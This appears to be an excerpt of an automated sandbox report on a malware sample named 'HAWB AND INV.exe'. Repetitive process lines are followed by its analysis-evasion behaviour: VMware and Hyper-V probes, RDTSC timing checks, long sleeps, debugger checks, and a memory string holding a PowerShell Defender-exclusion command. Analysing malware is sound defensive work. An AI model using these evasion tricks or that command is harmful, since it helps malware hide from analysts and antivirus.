          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: HAWB AND INV.exe PID: 6752, type: MEMORY
          Source: Yara matchFile source: 0.2.HAWB AND INV.exe.2d0f5ac.1.raw.unpack, type: UNPACKEDPE
          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
          Source: C:\Users\user\Desktop\HAWB AND INV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000001185E4 second address: 00000000001185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 000000000011896E second address: 0000000000118974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: IdentifierJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0Jump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_004088A0 rdtsc 10_2_004088A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_009745A8 sldt word ptr [eax]0_2_009745A8
          Source: C:\Users\user\Desktop\HAWB AND INV.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4137Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3031Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4167Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2752Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4731
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1801
          Source: C:\Users\user\Desktop\HAWB AND INV.exe TID: 6756Thread sleep time: -101846s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exe TID: 6796Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6844Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep count: 4167 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep count: 2752 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4532Thread sleep count: 43 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5536Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5940Thread sleep count: 4731 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5940Thread sleep count: 1801 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5688Thread sleep count: 47 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6876Thread sleep time: -22136092888451448s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\HAWB AND INV.exeThread delayed: delay time: 101846Jump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: powershell.exe, 00000004.00000003.475227153.00000000059ED000.00000004.00000001.sdmp, powershell.exe, 00000008.00000003.539404811.0000000005332000.00000004.00000001.sdmp Binary or memory string: Hyper-V
          Source: explorer.exe, 0000000B.00000000.410165765.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000B.00000000.410406652.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.390572167.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000002.615205318.00000000062E0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: explorer.exe, 0000000B.00000000.396565510.00000000063F6000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: VMWARE
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.390572167.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.410165765.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 0000000B.00000000.407965163.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 0000000B.00000000.390572167.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000B.00000000.407965163.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000000B.00000000.410406652.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: powershell.exe, 00000004.00000003.475227153.00000000059ED000.00000004.00000001.sdmp, powershell.exe, 00000008.00000003.539404811.0000000005332000.00000004.00000001.sdmp Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: explorer.exe, 0000000B.00000000.390572167.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 0000000B.00000002.594031738.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_004088A0 rdtsc 10_2_004088A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00409B10 LdrLoadDll,10_2_00409B10
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120513A mov eax, dword ptr fs:[00000030h]10_2_0120513A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120513A mov eax, dword ptr fs:[00000030h]10_2_0120513A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9100 mov eax, dword ptr fs:[00000030h]10_2_011D9100
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9100 mov eax, dword ptr fs:[00000030h]10_2_011D9100
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9100 mov eax, dword ptr fs:[00000030h]10_2_011D9100
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F4120 mov eax, dword ptr fs:[00000030h]10_2_011F4120
